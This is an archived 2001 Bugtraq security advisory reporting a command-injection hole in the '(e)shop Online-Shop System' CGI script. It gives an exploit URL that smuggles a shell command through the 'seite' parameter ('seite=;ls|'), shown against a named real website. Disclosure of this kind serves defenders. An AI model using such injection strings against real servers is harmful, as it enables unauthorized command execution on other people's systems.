advisory

From: Kernel|X| (secure@punkass.com)
Date: 09/16/01

• Previous message: aleph1@securityfocus.com: "Detecting Format-String Vulnerabilities with Type Qualifiers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Sat, 15 Sep 2001 17:44:51 -0700 (PDT)
Message-Id: <200109160044.f8G0ipN61735@voyager.myzona.net>
To: bugtraq@securityfocus.com
From: Kernel|X| <secure@punkass.com>
Subject: advisory

                    ------------[ advisory ]------------

name: (e)shop Online-Shop System

author:
WEBDISCOUNT, Inh. Michael Boehme

Problem:
Script doesnt check for symbol ";". any user
can execute any *nix commands on webserver.

exploit:
host/cgi-bin/eshop.pl?seite=;ls|

ex.
http://www.azl-mobilfunk.com/cgi-bin/eshop.pl?seite=;ls|

Bug found by Kernel|X|
 [ twisted metal ]

E-Mail: [secure@punkass.com]
        [kernelx@tmgroup.sh]
WWW: [ www.tmgroup.sh ]

------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh

---

• Previous message: aleph1@securityfocus.com: "Detecting Format-String Vulnerabilities with Type Qualifiers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2001-09